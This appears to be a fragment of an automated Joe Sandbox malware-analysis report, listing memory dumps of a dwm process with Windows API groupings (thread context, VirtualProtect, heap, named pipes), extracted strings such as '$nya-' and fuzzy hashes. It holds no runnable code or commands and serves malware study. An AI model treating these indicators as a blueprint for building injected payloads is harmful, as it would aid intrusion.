                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                  • String ID: CONOUT$
                                                  • API String ID: 3230265001-3130406586
                                                  • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                  • Instruction ID: f4de2d2b509f9ce663ded213ee1def69de5e51e4478d8841ccbd293a019bfbd5
                                                  • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                  • Instruction Fuzzy Hash: 15115B35210EA0C6E751CB96F85C71966B4F788BE4F844224EA5E87FE4CF7AC8188B41
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  • Associated: 00000012.00000002.3448137506.00000262F1D00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448432455.00000262F1D15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448513222.00000262F1D20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448655925.00000262F1D22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448714516.00000262F1D29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                  • String ID: CONOUT$
                                                  • API String ID: 3230265001-3130406586
                                                  • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                  • Instruction ID: a7d6f9bfa1550791c85832eaf6063042553c654316190d3bee1c3ab53e0af859
                                                  • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                  • Instruction Fuzzy Hash: 40114C35210EA0C6F7518B52A85C71977B0B78DBE4F844214EA5E97FA4CB3EC4088B40
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448872342.00000262F1D31000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D30000, based on PE: true
                                                  • Associated: 00000012.00000002.3448816247.00000262F1D30000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448971011.00000262F1D45000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3449077595.00000262F1D50000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3449181058.00000262F1D52000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3449289748.00000262F1D59000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d30000_dwm.jbxd
                                                  Similarity
                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                  • String ID: CONOUT$
                                                  • API String ID: 3230265001-3130406586
                                                  • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                  • Instruction ID: 831fb59a5558e7ee6d0df7a14871686ac93fcd69a9d63bcd8d369944c28b25c6
                                                  • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                  • Instruction Fuzzy Hash: 7D115B35210FA0C6E7558B56E95D71A67B0F788BE4F844224EA5E87F94CF3AC8088B40
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  • Associated: 00000012.00000002.3448137506.00000262F1D00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448432455.00000262F1D15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448513222.00000262F1D20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448655925.00000262F1D22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448714516.00000262F1D29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Thread$Current$Context
                                                  • String ID:
                                                  • API String ID: 1666949209-0
                                                  • Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                                  • Instruction ID: 193b8fc8fb425592c6930a3807b5cc66773ebd8d092fb9ab969b968d6749d96b
                                                  • Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                                  • Instruction Fuzzy Hash: CCD16A76209F98C1DA74DB1AE49835A77B0F788F88F900116EACD47BA9DF3AC555CB00
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Free$CurrentThread
                                                  • String ID:
                                                  • API String ID: 564911740-0
                                                  • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                                  • Instruction ID: dbe872ae4494f920a7f9ca5d67cb4c97ff9bbafee3b0e37269550e5c3d8de24f
                                                  • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                                  • Instruction Fuzzy Hash: AE51C634201F65D5EB06DB25D8AC29433B1BB04B44FC44939AA2D06BE9EF7AD92CC742
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  • Associated: 00000012.00000002.3448137506.00000262F1D00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448432455.00000262F1D15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448513222.00000262F1D20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448655925.00000262F1D22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448714516.00000262F1D29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Free$CurrentThread
                                                  • String ID:
                                                  • API String ID: 564911740-0
                                                  • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                                  • Instruction ID: 5b15fcac4f106ed112a9e1af7e1e923dbd6f0734b68a9551e8f94e8663edcaae
                                                  • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                                  • Instruction Fuzzy Hash: C951E535202FA9D5FB09DB24E89C29423B5FB04B44FC04929A96D47FA9EF7AC95CC740
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocFree
                                                  • String ID: $nya-
                                                  • API String ID: 756756679-1266920357
                                                  • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                  • Instruction ID: dec9c552ad4e832abc1e1bfca9b0e19e706214325b6ddf4de1baea4d5c3777cf
                                                  • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                  • Instruction Fuzzy Hash: 60316932701F65C2EA52DF66A96C76963B0BB44B84F889030DF4847FD5EF3AC4A98701
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  • Associated: 00000012.00000002.3448137506.00000262F1D00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448432455.00000262F1D15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448513222.00000262F1D20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448655925.00000262F1D22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448714516.00000262F1D29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocFree
                                                  • String ID: $nya-
                                                  • API String ID: 756756679-1266920357
                                                  • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                  • Instruction ID: a347bc1942ea7c4a43fd0d4e5d582fa3a3362efaca4353a2c0d6683e07ddbfa8
                                                  • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                  • Instruction Fuzzy Hash: EC315C32701F65EAFB15DF16A94C66963B0BB44F84F8840209E4947F69EF3AC4A9C700
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$Value$FreeHeap
                                                  • String ID:
                                                  • API String ID: 365477584-0
                                                  • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                                  • Instruction ID: fe2f3d8e17abd214f965bb9ce31b32200e7a584ae44387e26d20d8fc71c1887a
                                                  • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                                  • Instruction Fuzzy Hash: B4117735300EB0C2FA5A6731682D3BE11719B847A0FD54734A96656FD6DE3ACC098707
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  • Associated: 00000012.00000002.3448137506.00000262F1D00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448432455.00000262F1D15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448513222.00000262F1D20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448655925.00000262F1D22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448714516.00000262F1D29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$Value$FreeHeap
                                                  • String ID:
                                                  • API String ID: 365477584-0
                                                  • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                                  • Instruction ID: 6c5dcdc07d278e79b2e88af4f912f060bd502bf2eec486bf83c64b43b71d1586
                                                  • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                                  • Instruction Fuzzy Hash: A9114C31314E70C2FA186731689D3AE2272AB89FE0FD44625A86A56FDEDE3EC4494740
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                  • String ID:
                                                  • API String ID: 517849248-0
                                                  • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                  • Instruction ID: e66e74fe270ce6d8f09fa9ebcda9fa64f72df942dfecb16eb5d78e9ad60ceebd
                                                  • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                  • Instruction Fuzzy Hash: 99011B71705E50C6EB54DB12A86C35963B1F788FC0F8840359E5D83B95DE3AC989CB41
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  • Associated: 00000012.00000002.3448137506.00000262F1D00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448432455.00000262F1D15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448513222.00000262F1D20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448655925.00000262F1D22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448714516.00000262F1D29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                  • String ID:
                                                  • API String ID: 517849248-0
                                                  • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                  • Instruction ID: 922fdaf62109822db50c4d30f3ea032cb8b5ade3dfa48254d2e2c75aeece13d1
                                                  • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                  • Instruction Fuzzy Hash: 2C010971704A6486FB14DB52A89C35A62B5F78DFC0F8840359E5953B64DE3DC58ACB40
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                  • String ID:
                                                  • API String ID: 449555515-0
                                                  • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                  • Instruction ID: d97c29b32172ed4424d5d4fe8b8a45f99578b57b1518c16f068ddcfa3f4e46ed
                                                  • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                  • Instruction Fuzzy Hash: 06015774605F60C2EB65DB26F85C31A22B0AB48B41F940038DA4D46BE5EF3EC45CCB02
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  • Associated: 00000012.00000002.3448137506.00000262F1D00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448432455.00000262F1D15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448513222.00000262F1D20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448655925.00000262F1D22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448714516.00000262F1D29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                  • String ID:
                                                  • API String ID: 449555515-0
                                                  • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                  • Instruction ID: a68e317433246dfec9876a18cc917fcfd4046e7732792400411306add0e66c53
                                                  • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                  • Instruction Fuzzy Hash: 6D014C75211FA4C6FB249B61E84C71A73B4BB4AB45F844128DA5D17BA9EF3EC54CCB00
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: FinalHandleNamePathlstrlen
                                                  • String ID: \\?\
                                                  • API String ID: 2719912262-4282027825
                                                  • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                  • Instruction ID: 46a08e3e9825a35e292d4ae123f8ecda1783c5e34c1f2133b7e332fb7f0da7b3
                                                  • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                  • Instruction Fuzzy Hash: 61F03CB2304A95D2EB60CB21F99C3596371F744B88FC440319A4986ED5DE6EC68DCB01
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  • Associated: 00000012.00000002.3448137506.00000262F1D00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448432455.00000262F1D15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448513222.00000262F1D20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448655925.00000262F1D22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448714516.00000262F1D29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: FinalHandleNamePathlstrlen
                                                  • String ID: \\?\
                                                  • API String ID: 2719912262-4282027825
                                                  • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                  • Instruction ID: 627d793779b4fb71c53698818714985133b41b2a005b23078a6382d94af29437
                                                  • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                  • Instruction Fuzzy Hash: 84F03C72304E99D2FB208B61E58C3596371F749B88FC440219A4946D68DF6EC69CCB00
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: CombinePath
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3422762182-91387939
                                                  • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                                  • Instruction ID: 2d70aa3d07742b66c1db06fbcd7bb005ca2c9c5ccb713c61cdb6be3a7e0e1e7a
                                                  • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                                  • Instruction Fuzzy Hash: F6F08274304FA0C1EA45CB13B92C1196670BB48FC0FC89030EE0A87F99CE3DC4498B01
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                  • String ID: CorExitProcess$mscoree.dll
                                                  • API String ID: 4061214504-1276376045
                                                  • Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                                  • Instruction ID: 81abed9903feba85f37031435fbbdb1edac0442b8016a88f6e98db0da8679678
                                                  • Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                                  • Instruction Fuzzy Hash: 1BF09A31211E61C1EA15CB24E8AD3696330EB897A0FD40339DAAA869E4CF3EC44CC702
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  • Associated: 00000012.00000002.3448137506.00000262F1D00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448432455.00000262F1D15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448513222.00000262F1D20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448655925.00000262F1D22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448714516.00000262F1D29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: CombinePath
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3422762182-91387939
                                                  • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                                  • Instruction ID: b253053fa2b6f8e9201f0124f0b901716077b6c4a04d9180ad6cf466b8c26997
                                                  • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                                  • Instruction Fuzzy Hash: BDF058B4304FA4C2FB048B12B91C219A271AB8DFC0FC88130EE0A17F29CE6DC44A8B00
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  • Associated: 00000012.00000002.3448137506.00000262F1D00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448432455.00000262F1D15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448513222.00000262F1D20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448655925.00000262F1D22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448714516.00000262F1D29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                  • String ID: CorExitProcess$mscoree.dll
                                                  • API String ID: 4061214504-1276376045
